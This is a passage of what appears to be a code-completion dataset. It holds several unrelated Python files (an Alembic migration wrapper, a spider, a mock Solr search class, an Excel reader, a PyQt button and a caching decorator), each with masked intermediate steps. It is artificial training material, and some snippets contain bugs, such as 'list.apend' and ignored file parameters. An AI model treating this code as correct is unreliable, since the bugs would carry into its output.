float(input(\"\"))\nlargura = float(input(\"\"))\ncomprimento = float(input(\"\"))\n\nif __name__ == '__main__':\n main()\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
"""Wrapper over the command line migrate tool to better work with config files.""" import subprocess import sys from alembic.migration import MigrationContext from ..lib.alembic import bootstrap_db from ..lib.sqla import create_engine from ..models import DBSession as db def main(): if len(sys.argv) < 3: sys.stderr.write('Usage: %s CONFIG_URI {bootstrap | ALEMBIC_OPTS}\n' % sys.argv[0]) sys.exit(1) config_uri = sys.argv.pop(1) if sys.argv[1] == 'bootstrap': bootstrap_db(config_uri) else: engine = create_engine(config_uri) db.configure(bind=engine) context = MigrationContext.configure(engine.connect()) db_version = context.get_current_revision() if not db_version: sys.stderr.write('Database not initialized.\n' 'Try this: "sortie-db-manage %s bootstrap"\n' % config_uri) sys.exit(2) cmd = ['alembic', '-c', config_uri] + sys.argv[1:] print(subprocess.check_output(cmd))
normal
{ "blob_id": "7b459cf321f351e1485a9aef0ca23067f411e430", "index": 7446, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef main():\n if len(sys.argv) < 3:\n sys.stderr.write(\n 'Usage: %s CONFIG_URI {bootstrap | ALEMBIC_OPTS}\\n' % sys.argv[0])\n sys.exit(1)\n config_uri = sys.argv.pop(1)\n if sys.argv[1] == 'bootstrap':\n bootstrap_db(config_uri)\n else:\n engine = create_engine(config_uri)\n db.configure(bind=engine)\n context = MigrationContext.configure(engine.connect())\n db_version = context.get_current_revision()\n if not db_version:\n sys.stderr.write(\n \"\"\"Database not initialized.\nTry this: \"sortie-db-manage %s bootstrap\\\"\n\"\"\"\n % config_uri)\n sys.exit(2)\n cmd = ['alembic', '-c', config_uri] + sys.argv[1:]\n print(subprocess.check_output(cmd))\n", "step-3": "<mask token>\nimport subprocess\nimport sys\nfrom alembic.migration import MigrationContext\nfrom ..lib.alembic import bootstrap_db\nfrom ..lib.sqla import create_engine\nfrom ..models import DBSession as db\n\n\ndef main():\n if len(sys.argv) < 3:\n sys.stderr.write(\n 'Usage: %s CONFIG_URI {bootstrap | ALEMBIC_OPTS}\\n' % sys.argv[0])\n sys.exit(1)\n config_uri = sys.argv.pop(1)\n if sys.argv[1] == 'bootstrap':\n bootstrap_db(config_uri)\n else:\n engine = create_engine(config_uri)\n db.configure(bind=engine)\n context = MigrationContext.configure(engine.connect())\n db_version = context.get_current_revision()\n if not db_version:\n sys.stderr.write(\n \"\"\"Database not initialized.\nTry this: \"sortie-db-manage %s bootstrap\\\"\n\"\"\"\n % config_uri)\n sys.exit(2)\n cmd = ['alembic', '-c', config_uri] + sys.argv[1:]\n print(subprocess.check_output(cmd))\n", "step-4": "\"\"\"Wrapper over the command line migrate tool to better work with\nconfig files.\"\"\"\n\nimport subprocess\nimport sys\n\nfrom alembic.migration import MigrationContext\n\nfrom ..lib.alembic import bootstrap_db\nfrom ..lib.sqla import create_engine\nfrom ..models import DBSession as db\n\n\ndef main():\n if len(sys.argv) < 3:\n sys.stderr.write('Usage: %s CONFIG_URI {bootstrap | ALEMBIC_OPTS}\\n'\n % sys.argv[0])\n sys.exit(1)\n\n config_uri = sys.argv.pop(1)\n\n if sys.argv[1] == 'bootstrap':\n bootstrap_db(config_uri)\n else:\n engine = create_engine(config_uri)\n db.configure(bind=engine)\n context = MigrationContext.configure(engine.connect())\n db_version = context.get_current_revision()\n\n if not db_version:\n sys.stderr.write('Database not initialized.\\n'\n 'Try this: \"sortie-db-manage %s bootstrap\"\\n'\n % config_uri)\n sys.exit(2)\n\n cmd = ['alembic', '-c', config_uri] + sys.argv[1:]\n\n print(subprocess.check_output(cmd))\n", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
from locations.storefinders.stockinstore import StockInStoreSpider class ScooterHutAUSpider(StockInStoreSpider): name = "scooter_hut_au" item_attributes = {"brand": "Scooter Hut", "brand_wikidata": "Q117747623"} api_site_id = "10112" api_widget_id = "119" api_widget_type = "product" api_origin = "https://scooterhut.com.au"
normal
{ "blob_id": "e37f4422c1063df50453f7abf72a0a9a31156d8b", "index": 899, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass ScooterHutAUSpider(StockInStoreSpider):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass ScooterHutAUSpider(StockInStoreSpider):\n name = 'scooter_hut_au'\n item_attributes = {'brand': 'Scooter Hut', 'brand_wikidata': 'Q117747623'}\n api_site_id = '10112'\n api_widget_id = '119'\n api_widget_type = 'product'\n api_origin = 'https://scooterhut.com.au'\n", "step-4": "from locations.storefinders.stockinstore import StockInStoreSpider\n\n\nclass ScooterHutAUSpider(StockInStoreSpider):\n name = 'scooter_hut_au'\n item_attributes = {'brand': 'Scooter Hut', 'brand_wikidata': 'Q117747623'}\n api_site_id = '10112'\n api_widget_id = '119'\n api_widget_type = 'product'\n api_origin = 'https://scooterhut.com.au'\n", "step-5": "from locations.storefinders.stockinstore import StockInStoreSpider\n\n\nclass ScooterHutAUSpider(StockInStoreSpider):\n name = \"scooter_hut_au\"\n item_attributes = {\"brand\": \"Scooter Hut\", \"brand_wikidata\": \"Q117747623\"}\n api_site_id = \"10112\"\n api_widget_id = \"119\"\n api_widget_type = \"product\"\n api_origin = \"https://scooterhut.com.au\"\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import shlex class MockSOLR(object): class MockHits(list): @property def hits(self): return len(self) @property def docs(self): return self def __init__(self): self.db = {} def add(self, objects): for o in objects: o['text'] = ''.join(o['text']) self.db[o['id']] = o def commit(self): pass def search(self, q, fq=None, **kw): if isinstance(q, unicode): q = q.encode('latin-1') # Parse query preds = [] q_parts = shlex.split(q) if fq: q_parts += fq for part in q_parts: if part == '&&': continue if ':' in part: field, value = part.split(':', 1) preds.append((field, value)) else: preds.append(('text', part)) result = self.MockHits() for obj in self.db.values(): for field, value in preds: neg = False if field[0] == '!': neg = True field = field[1:] if field == 'text' or field.endswith('_t'): if (value not in str(obj.get(field, ''))) ^ neg: break else: if (value != str(obj.get(field, ''))) ^ neg: break else: result.append(obj) return result def delete(self, *args, **kwargs): if kwargs.get('q', None) == '*:*': self.db = {} elif kwargs.get('id', None): del self.db[kwargs['id']] elif kwargs.get('q', None): for doc in self.search(kwargs['q']): self.delete(id=doc['id'])
normal
{ "blob_id": "4774c1f4eafc0132bab0073b60c4bcad6b69380d", "index": 9068, "step-1": "<mask token>\n\n\nclass MockSOLR(object):\n\n\n class MockHits(list):\n\n @property\n def hits(self):\n return len(self)\n\n @property\n def docs(self):\n return self\n <mask token>\n <mask token>\n <mask token>\n\n def search(self, q, fq=None, **kw):\n if isinstance(q, unicode):\n q = q.encode('latin-1')\n preds = []\n q_parts = shlex.split(q)\n if fq:\n q_parts += fq\n for part in q_parts:\n if part == '&&':\n continue\n if ':' in part:\n field, value = part.split(':', 1)\n preds.append((field, value))\n else:\n preds.append(('text', part))\n result = self.MockHits()\n for obj in self.db.values():\n for field, value in preds:\n neg = False\n if field[0] == '!':\n neg = True\n field = field[1:]\n if field == 'text' or field.endswith('_t'):\n if (value not in str(obj.get(field, ''))) ^ neg:\n break\n elif (value != str(obj.get(field, ''))) ^ neg:\n break\n else:\n result.append(obj)\n return result\n\n def delete(self, *args, **kwargs):\n if kwargs.get('q', None) == '*:*':\n self.db = {}\n elif kwargs.get('id', None):\n del self.db[kwargs['id']]\n elif kwargs.get('q', None):\n for doc in self.search(kwargs['q']):\n self.delete(id=doc['id'])\n", "step-2": "<mask token>\n\n\nclass MockSOLR(object):\n\n\n class MockHits(list):\n\n @property\n def hits(self):\n return len(self)\n\n @property\n def docs(self):\n return self\n\n def __init__(self):\n self.db = {}\n\n def add(self, objects):\n for o in objects:\n o['text'] = ''.join(o['text'])\n self.db[o['id']] = o\n <mask token>\n\n def search(self, q, fq=None, **kw):\n if isinstance(q, unicode):\n q = q.encode('latin-1')\n preds = []\n q_parts = shlex.split(q)\n if fq:\n q_parts += fq\n for part in q_parts:\n if part == '&&':\n continue\n if ':' in part:\n field, value = part.split(':', 1)\n preds.append((field, value))\n else:\n preds.append(('text', part))\n result = self.MockHits()\n for obj in self.db.values():\n for field, value in preds:\n neg = False\n if field[0] == '!':\n neg = True\n field = field[1:]\n if field == 'text' or field.endswith('_t'):\n if (value not in str(obj.get(field, ''))) ^ neg:\n break\n elif (value != str(obj.get(field, ''))) ^ neg:\n break\n else:\n result.append(obj)\n return result\n\n def delete(self, *args, **kwargs):\n if kwargs.get('q', None) == '*:*':\n self.db = {}\n elif kwargs.get('id', None):\n del self.db[kwargs['id']]\n elif kwargs.get('q', None):\n for doc in self.search(kwargs['q']):\n self.delete(id=doc['id'])\n", "step-3": "<mask token>\n\n\nclass MockSOLR(object):\n\n\n class MockHits(list):\n\n @property\n def hits(self):\n return len(self)\n\n @property\n def docs(self):\n return self\n\n def __init__(self):\n self.db = {}\n\n def add(self, objects):\n for o in objects:\n o['text'] = ''.join(o['text'])\n self.db[o['id']] = o\n\n def commit(self):\n pass\n\n def search(self, q, fq=None, **kw):\n if isinstance(q, unicode):\n q = q.encode('latin-1')\n preds = []\n q_parts = shlex.split(q)\n if fq:\n q_parts += fq\n for part in q_parts:\n if part == '&&':\n continue\n if ':' in part:\n field, value = part.split(':', 1)\n preds.append((field, value))\n else:\n preds.append(('text', part))\n result = self.MockHits()\n for obj in self.db.values():\n for field, value in preds:\n neg = False\n if field[0] == '!':\n neg = True\n field = field[1:]\n if field == 'text' or field.endswith('_t'):\n if (value not in str(obj.get(field, ''))) ^ neg:\n break\n elif (value != str(obj.get(field, ''))) ^ neg:\n break\n else:\n result.append(obj)\n return result\n\n def delete(self, *args, **kwargs):\n if kwargs.get('q', None) == '*:*':\n self.db = {}\n elif kwargs.get('id', None):\n del self.db[kwargs['id']]\n elif kwargs.get('q', None):\n for doc in self.search(kwargs['q']):\n self.delete(id=doc['id'])\n", "step-4": "import shlex\n\n\nclass MockSOLR(object):\n\n\n class MockHits(list):\n\n @property\n def hits(self):\n return len(self)\n\n @property\n def docs(self):\n return self\n\n def __init__(self):\n self.db = {}\n\n def add(self, objects):\n for o in objects:\n o['text'] = ''.join(o['text'])\n self.db[o['id']] = o\n\n def commit(self):\n pass\n\n def search(self, q, fq=None, **kw):\n if isinstance(q, unicode):\n q = q.encode('latin-1')\n preds = []\n q_parts = shlex.split(q)\n if fq:\n q_parts += fq\n for part in q_parts:\n if part == '&&':\n continue\n if ':' in part:\n field, value = part.split(':', 1)\n preds.append((field, value))\n else:\n preds.append(('text', part))\n result = self.MockHits()\n for obj in self.db.values():\n for field, value in preds:\n neg = False\n if field[0] == '!':\n neg = True\n field = field[1:]\n if field == 'text' or field.endswith('_t'):\n if (value not in str(obj.get(field, ''))) ^ neg:\n break\n elif (value != str(obj.get(field, ''))) ^ neg:\n break\n else:\n result.append(obj)\n return result\n\n def delete(self, *args, **kwargs):\n if kwargs.get('q', None) == '*:*':\n self.db = {}\n elif kwargs.get('id', None):\n del self.db[kwargs['id']]\n elif kwargs.get('q', None):\n for doc in self.search(kwargs['q']):\n self.delete(id=doc['id'])\n", "step-5": "import shlex\n\n\nclass MockSOLR(object):\n\n class MockHits(list):\n @property\n def hits(self):\n return len(self)\n\n @property\n def docs(self):\n return self\n\n def __init__(self):\n self.db = {}\n\n def add(self, objects):\n for o in objects:\n o['text'] = ''.join(o['text'])\n self.db[o['id']] = o\n\n def commit(self):\n pass\n\n def search(self, q, fq=None, **kw):\n if isinstance(q, unicode):\n q = q.encode('latin-1')\n # Parse query\n preds = []\n q_parts = shlex.split(q)\n if fq:\n q_parts += fq\n for part in q_parts:\n if part == '&&':\n continue\n if ':' in part:\n field, value = part.split(':', 1)\n preds.append((field, value))\n else:\n preds.append(('text', part))\n result = self.MockHits()\n for obj in self.db.values():\n for field, value in preds:\n neg = False\n if field[0] == '!':\n neg = True\n field = field[1:]\n if field == 'text' or field.endswith('_t'):\n if (value not in str(obj.get(field, ''))) ^ neg:\n break\n else:\n if (value != str(obj.get(field, ''))) ^ neg:\n break\n else:\n result.append(obj)\n return result\n\n def delete(self, *args, **kwargs):\n if kwargs.get('q', None) == '*:*':\n self.db = {}\n elif kwargs.get('id', None):\n del self.db[kwargs['id']]\n elif kwargs.get('q', None):\n for doc in self.search(kwargs['q']):\n self.delete(id=doc['id'])\n", "step-ids": [ 3, 5, 6, 7, 8 ] }
[ 3, 5, 6, 7, 8 ]
import xdrlib,sys import xlrd def open_excel(file='D:\基金公司\数据库-制表符\资产组合-基金公司维度.xlsx'): try: data=xlrd.open_workbook('D:\基金公司\数据库-制表符\资产组合-基金公司维度.xlsx') return data except Exception as e: print (str(e)) def excel_table_byindex(file='D:\基金公司\数据库-制表符\资产组合-基金公司维度.xlsx',colnameindex=0,by_index=0): data=open_excel(file='D:\基金公司\数据库-制表符\资产组合-基金公司维度.xlsx') table=data.sheets()[by_index] nrows=table.nrows ncols=table.ncols colnames=table.row_values(colnameindex) list=[] for rownum in range(1,nrows): row=table.row_values(rownum) if row: app={} for i in range(len(colnames)): app[colnames[i]]=row[i] list.apend(app) return list
normal
{ "blob_id": "d211594a034489d36a5648bf0b926fbd734fd0df", "index": 6928, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\ndef excel_table_byindex(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx',\n colnameindex=0, by_index=0):\n data = open_excel(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx')\n table = data.sheets()[by_index]\n nrows = table.nrows\n ncols = table.ncols\n colnames = table.row_values(colnameindex)\n list = []\n for rownum in range(1, nrows):\n row = table.row_values(rownum)\n if row:\n app = {}\n for i in range(len(colnames)):\n app[colnames[i]] = row[i]\n list.apend(app)\n return list\n", "step-3": "<mask token>\n\n\ndef open_excel(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx'):\n try:\n data = xlrd.open_workbook('D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx')\n return data\n except Exception as e:\n print(str(e))\n\n\ndef excel_table_byindex(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx',\n colnameindex=0, by_index=0):\n data = open_excel(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx')\n table = data.sheets()[by_index]\n nrows = table.nrows\n ncols = table.ncols\n colnames = table.row_values(colnameindex)\n list = []\n for rownum in range(1, nrows):\n row = table.row_values(rownum)\n if row:\n app = {}\n for i in range(len(colnames)):\n app[colnames[i]] = row[i]\n list.apend(app)\n return list\n", "step-4": "import xdrlib, sys\nimport xlrd\n\n\ndef open_excel(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx'):\n try:\n data = xlrd.open_workbook('D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx')\n return data\n except Exception as e:\n print(str(e))\n\n\ndef excel_table_byindex(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx',\n colnameindex=0, by_index=0):\n data = open_excel(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx')\n table = data.sheets()[by_index]\n nrows = table.nrows\n ncols = table.ncols\n colnames = table.row_values(colnameindex)\n list = []\n for rownum in range(1, nrows):\n row = table.row_values(rownum)\n if row:\n app = {}\n for i in range(len(colnames)):\n app[colnames[i]] = row[i]\n list.apend(app)\n return list\n", "step-5": "import xdrlib,sys\nimport xlrd\ndef open_excel(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx'):\n try:\n data=xlrd.open_workbook('D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx')\n return data\n except Exception as e:\n print (str(e))\ndef excel_table_byindex(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx',colnameindex=0,by_index=0):\n data=open_excel(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx')\n table=data.sheets()[by_index]\n nrows=table.nrows\n ncols=table.ncols\n colnames=table.row_values(colnameindex)\n list=[]\n for rownum in range(1,nrows):\n row=table.row_values(rownum)\n if row:\n app={}\n for i in range(len(colnames)):\n app[colnames[i]]=row[i]\n list.apend(app)\n return list\n\n\n\n\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
import ZooAnnouncerInterface class ZooAnnouncer(ZooAnnouncerInterface): def updateZoo(self,annoucement): print("ZooAnnouncer :" + annoucement)
normal
{ "blob_id": "be9c21ee04a612f711a1e6a82ea9478c77b62a82", "index": 8112, "step-1": "<mask token>\n", "step-2": "<mask token>\n\n\nclass ZooAnnouncer(ZooAnnouncerInterface):\n <mask token>\n", "step-3": "<mask token>\n\n\nclass ZooAnnouncer(ZooAnnouncerInterface):\n\n def updateZoo(self, annoucement):\n print('ZooAnnouncer :' + annoucement)\n", "step-4": "import ZooAnnouncerInterface\n\n\nclass ZooAnnouncer(ZooAnnouncerInterface):\n\n def updateZoo(self, annoucement):\n print('ZooAnnouncer :' + annoucement)\n", "step-5": "import ZooAnnouncerInterface\n\nclass ZooAnnouncer(ZooAnnouncerInterface):\n def updateZoo(self,annoucement):\n print(\"ZooAnnouncer :\" + annoucement)", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
# -*- coding:utf-8 -*- ''' Created on 2016��4��8�� @author: liping ''' import sys from PyQt4 import QtGui,QtCore class QuitButton(QtGui.QWidget): def __init__(self,parent = None): QtGui.QWidget.__init__(self,parent) self.setGeometry(300,300,250,150) self.setWindowTitle('quitButton') quit = QtGui.QPushButton('Close',self) quit.setGeometry(100,100,60,35) self.connect(quit, QtCore.SIGNAL('clicked()'), QtGui.qApp,QtCore.SLOT('quit()')) app = QtGui.QApplication(sys.argv) qb = QuitButton() qb.show() sys.exit(app.exec_())
normal
{ "blob_id": "5a3431b79b8f42b3042bb27d787d0d92891a7415", "index": 3947, "step-1": "<mask token>\n\n\nclass QuitButton(QtGui.QWidget):\n <mask token>\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass QuitButton(QtGui.QWidget):\n\n def __init__(self, parent=None):\n QtGui.QWidget.__init__(self, parent)\n self.setGeometry(300, 300, 250, 150)\n self.setWindowTitle('quitButton')\n quit = QtGui.QPushButton('Close', self)\n quit.setGeometry(100, 100, 60, 35)\n self.connect(quit, QtCore.SIGNAL('clicked()'), QtGui.qApp, QtCore.\n SLOT('quit()'))\n\n\n<mask token>\nqb.show()\nsys.exit(app.exec_())\n", "step-3": "<mask token>\n\n\nclass QuitButton(QtGui.QWidget):\n\n def __init__(self, parent=None):\n QtGui.QWidget.__init__(self, parent)\n self.setGeometry(300, 300, 250, 150)\n self.setWindowTitle('quitButton')\n quit = QtGui.QPushButton('Close', self)\n quit.setGeometry(100, 100, 60, 35)\n self.connect(quit, QtCore.SIGNAL('clicked()'), QtGui.qApp, QtCore.\n SLOT('quit()'))\n\n\napp = QtGui.QApplication(sys.argv)\nqb = QuitButton()\nqb.show()\nsys.exit(app.exec_())\n", "step-4": "<mask token>\nimport sys\nfrom PyQt4 import QtGui, QtCore\n\n\nclass QuitButton(QtGui.QWidget):\n\n def __init__(self, parent=None):\n QtGui.QWidget.__init__(self, parent)\n self.setGeometry(300, 300, 250, 150)\n self.setWindowTitle('quitButton')\n quit = QtGui.QPushButton('Close', self)\n quit.setGeometry(100, 100, 60, 35)\n self.connect(quit, QtCore.SIGNAL('clicked()'), QtGui.qApp, QtCore.\n SLOT('quit()'))\n\n\napp = QtGui.QApplication(sys.argv)\nqb = QuitButton()\nqb.show()\nsys.exit(app.exec_())\n", "step-5": "# -*- coding:utf-8 -*-\n'''\nCreated on 2016��4��8��\n\n@author: liping\n'''\n\nimport sys\nfrom PyQt4 import QtGui,QtCore\n\nclass QuitButton(QtGui.QWidget):\n def __init__(self,parent = None):\n QtGui.QWidget.__init__(self,parent)\n \n self.setGeometry(300,300,250,150)\n self.setWindowTitle('quitButton')\n \n quit = QtGui.QPushButton('Close',self)\n quit.setGeometry(100,100,60,35)\n \n self.connect(quit, QtCore.SIGNAL('clicked()'), QtGui.qApp,QtCore.SLOT('quit()'))\n \napp = QtGui.QApplication(sys.argv)\nqb = QuitButton()\nqb.show()\nsys.exit(app.exec_())", "step-ids": [ 1, 3, 4, 5, 6 ] }
[ 1, 3, 4, 5, 6 ]
""" Base cache mechanism """ import time import string import codecs import pickle from functools import wraps from abc import ABCMeta, abstractmethod from asyncio import iscoroutinefunction class BaseCache(metaclass=ABCMeta): """Base cache class.""" @abstractmethod def __init__(self, kvstore, makekey, lifetime, fail_silent): self._kvstore = kvstore self._makekey = makekey self._lifetime = lifetime self._fail_silent = fail_silent def __call__(self, func): @wraps(func) def wrapper(*args, **kwargs): """decorator.""" key = self._makekey(func, args, kwargs) if self._kvstore.exists(key): value_str = self._kvstore.get(key) try: value = pickle.loads(codecs.decode(value_str.encode(), "base64")) if self._lifetime is None or time.time() - value['time'] < self._lifetime: result = value['data'] return result except: # pylint: disable=W0702 if not self._fail_silent: raise result = func(*args, **kwargs) value = {'time': time.time(), 'data': result} value_str = codecs.encode(pickle.dumps(value), "base64").decode() self._kvstore.set(key, value_str) return result @wraps(func) async def async_wrapper(*args, **kwargs): """async decorator.""" key = self._makekey(func, args, kwargs) if self._kvstore.exists(key): value_str = self._kvstore.get(key) try: value = pickle.loads(codecs.decode(value_str.encode(), "base64")) if self._lifetime is None or time.time() - value['time'] < self._lifetime: result = value['data'] return result except: # pylint: disable=W0702 if not self._fail_silent: raise result = await func(*args, **kwargs) value = {'time': time.time(), 'data': result} value_str = codecs.encode(pickle.dumps(value), "base64").decode() self._kvstore.set(key, value_str) return result if iscoroutinefunction(func): return async_wrapper return wrapper @staticmethod def makekey(function, *args, **kwargs) -> str: """creates a unique key based to be used when storing the cache. :param function: function :param *args: positional args of the function :param **kwargs: keyword arguments of the function :return: string base64 key """ arguments = str((function.__name__, args, kwargs)).strip() arguments = arguments.translate( str.maketrans('', '', string.punctuation+string.whitespace) ) key = codecs.encode(pickle.dumps(arguments, protocol=0), "base64").decode().strip() return key
normal
{ "blob_id": "e810cde7f77d36c6a43f8c277b66d038b143aae6", "index": 6746, "step-1": "<mask token>\n\n\nclass BaseCache(metaclass=ABCMeta):\n <mask token>\n\n @abstractmethod\n def __init__(self, kvstore, makekey, lifetime, fail_silent):\n self._kvstore = kvstore\n self._makekey = makekey\n self._lifetime = lifetime\n self._fail_silent = fail_silent\n <mask token>\n\n @staticmethod\n def makekey(function, *args, **kwargs) ->str:\n \"\"\"creates a unique key based to be used when storing the cache.\n :param function: function\n :param *args: positional args of the function\n :param **kwargs: keyword arguments of the function\n :return: string base64 key\n \"\"\"\n arguments = str((function.__name__, args, kwargs)).strip()\n arguments = arguments.translate(str.maketrans('', '', string.\n punctuation + string.whitespace))\n key = codecs.encode(pickle.dumps(arguments, protocol=0), 'base64'\n ).decode().strip()\n return key\n", "step-2": "<mask token>\n\n\nclass BaseCache(metaclass=ABCMeta):\n <mask token>\n\n @abstractmethod\n def __init__(self, kvstore, makekey, lifetime, fail_silent):\n self._kvstore = kvstore\n self._makekey = makekey\n self._lifetime = lifetime\n self._fail_silent = fail_silent\n\n def __call__(self, func):\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n \"\"\"decorator.\"\"\"\n key = self._makekey(func, args, kwargs)\n if self._kvstore.exists(key):\n value_str = self._kvstore.get(key)\n try:\n value = pickle.loads(codecs.decode(value_str.encode(),\n 'base64'))\n if self._lifetime is None or time.time() - value['time'\n ] < self._lifetime:\n result = value['data']\n return result\n except:\n if not self._fail_silent:\n raise\n result = func(*args, **kwargs)\n value = {'time': time.time(), 'data': result}\n value_str = codecs.encode(pickle.dumps(value), 'base64').decode()\n self._kvstore.set(key, value_str)\n return result\n\n @wraps(func)\n async def async_wrapper(*args, **kwargs):\n \"\"\"async decorator.\"\"\"\n key = self._makekey(func, args, kwargs)\n if self._kvstore.exists(key):\n value_str = self._kvstore.get(key)\n try:\n value = pickle.loads(codecs.decode(value_str.encode(),\n 'base64'))\n if self._lifetime is None or time.time() - value['time'\n ] < self._lifetime:\n result = value['data']\n return result\n except:\n if not self._fail_silent:\n raise\n result = await func(*args, **kwargs)\n value = {'time': time.time(), 'data': result}\n value_str = codecs.encode(pickle.dumps(value), 'base64').decode()\n self._kvstore.set(key, value_str)\n return result\n if iscoroutinefunction(func):\n return async_wrapper\n return wrapper\n\n @staticmethod\n def makekey(function, *args, **kwargs) ->str:\n \"\"\"creates a unique key based to be used when storing the cache.\n :param function: function\n :param *args: positional args of the function\n :param **kwargs: keyword arguments of the function\n :return: string base64 key\n \"\"\"\n arguments = str((function.__name__, args, kwargs)).strip()\n arguments = arguments.translate(str.maketrans('', '', string.\n punctuation + string.whitespace))\n key = codecs.encode(pickle.dumps(arguments, protocol=0), 'base64'\n ).decode().strip()\n return key\n", "step-3": "<mask token>\n\n\nclass BaseCache(metaclass=ABCMeta):\n \"\"\"Base cache class.\"\"\"\n\n @abstractmethod\n def __init__(self, kvstore, makekey, lifetime, fail_silent):\n self._kvstore = kvstore\n self._makekey = makekey\n self._lifetime = lifetime\n self._fail_silent = fail_silent\n\n def __call__(self, func):\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n \"\"\"decorator.\"\"\"\n key = self._makekey(func, args, kwargs)\n if self._kvstore.exists(key):\n value_str = self._kvstore.get(key)\n try:\n value = pickle.loads(codecs.decode(value_str.encode(),\n 'base64'))\n if self._lifetime is None or time.time() - value['time'\n ] < self._lifetime:\n result = value['data']\n return result\n except:\n if not self._fail_silent:\n raise\n result = func(*args, **kwargs)\n value = {'time': time.time(), 'data': result}\n value_str = codecs.encode(pickle.dumps(value), 'base64').decode()\n self._kvstore.set(key, value_str)\n return result\n\n @wraps(func)\n async def async_wrapper(*args, **kwargs):\n \"\"\"async decorator.\"\"\"\n key = self._makekey(func, args, kwargs)\n if self._kvstore.exists(key):\n value_str = self._kvstore.get(key)\n try:\n value = pickle.loads(codecs.decode(value_str.encode(),\n 'base64'))\n if self._lifetime is None or time.time() - value['time'\n ] < self._lifetime:\n result = value['data']\n return result\n except:\n if not self._fail_silent:\n raise\n result = await func(*args, **kwargs)\n value = {'time': time.time(), 'data': result}\n value_str = codecs.encode(pickle.dumps(value), 'base64').decode()\n self._kvstore.set(key, value_str)\n return result\n if iscoroutinefunction(func):\n return async_wrapper\n return wrapper\n\n @staticmethod\n def makekey(function, *args, **kwargs) ->str:\n \"\"\"creates a unique key based to be used when storing the cache.\n :param function: function\n :param *args: positional args of the function\n :param **kwargs: keyword arguments of the function\n :return: string base64 key\n \"\"\"\n arguments = str((function.__name__, args, kwargs)).strip()\n arguments = arguments.translate(str.maketrans('', '', string.\n punctuation + string.whitespace))\n key = codecs.encode(pickle.dumps(arguments, protocol=0), 'base64'\n ).decode().strip()\n return key\n", "step-4": "<mask token>\nimport time\nimport string\nimport codecs\nimport pickle\nfrom functools import wraps\nfrom abc import ABCMeta, abstractmethod\nfrom asyncio import iscoroutinefunction\n\n\nclass BaseCache(metaclass=ABCMeta):\n \"\"\"Base cache class.\"\"\"\n\n @abstractmethod\n def __init__(self, kvstore, makekey, lifetime, fail_silent):\n self._kvstore = kvstore\n self._makekey = makekey\n self._lifetime = lifetime\n self._fail_silent = fail_silent\n\n def __call__(self, func):\n\n @wraps(func)\n def wrapper(*args, **kwargs):\n \"\"\"decorator.\"\"\"\n key = self._makekey(func, args, kwargs)\n if self._kvstore.exists(key):\n value_str = self._kvstore.get(key)\n try:\n value = pickle.loads(codecs.decode(value_str.encode(),\n 'base64'))\n if self._lifetime is None or time.time() - value['time'\n ] < self._lifetime:\n result = value['data']\n return result\n except:\n if not self._fail_silent:\n raise\n result = func(*args, **kwargs)\n value = {'time': time.time(), 'data': result}\n value_str = codecs.encode(pickle.dumps(value), 'base64').decode()\n self._kvstore.set(key, value_str)\n return result\n\n @wraps(func)\n async def async_wrapper(*args, **kwargs):\n \"\"\"async decorator.\"\"\"\n key = self._makekey(func, args, kwargs)\n if self._kvstore.exists(key):\n value_str = self._kvstore.get(key)\n try:\n value = pickle.loads(codecs.decode(value_str.encode(),\n 'base64'))\n if self._lifetime is None or time.time() - value['time'\n ] < self._lifetime:\n result = value['data']\n return result\n except:\n if not self._fail_silent:\n raise\n result = await func(*args, **kwargs)\n value = {'time': time.time(), 'data': result}\n value_str = codecs.encode(pickle.dumps(value), 'base64').decode()\n self._kvstore.set(key, value_str)\n return result\n if iscoroutinefunction(func):\n return async_wrapper\n return wrapper\n\n @staticmethod\n def makekey(function, *args, **kwargs) ->str:\n \"\"\"creates a unique key based to be used when storing the cache.\n :param function: function\n :param *args: positional args of the function\n :param **kwargs: keyword arguments of the function\n :return: string base64 key\n \"\"\"\n arguments = str((function.__name__, args, kwargs)).strip()\n arguments = arguments.translate(str.maketrans('', '', string.\n punctuation + string.whitespace))\n key = codecs.encode(pickle.dumps(arguments, protocol=0), 'base64'\n ).decode().strip()\n return key\n", "step-5": "\"\"\"\nBase cache mechanism\n\"\"\"\nimport time\nimport string\nimport codecs\nimport pickle\nfrom functools import wraps\nfrom abc import ABCMeta, abstractmethod\nfrom asyncio import iscoroutinefunction\n\n\nclass BaseCache(metaclass=ABCMeta):\n \"\"\"Base cache class.\"\"\"\n @abstractmethod\n def __init__(self, kvstore, makekey, lifetime, fail_silent):\n self._kvstore = kvstore\n self._makekey = makekey\n self._lifetime = lifetime\n self._fail_silent = fail_silent\n\n def __call__(self, 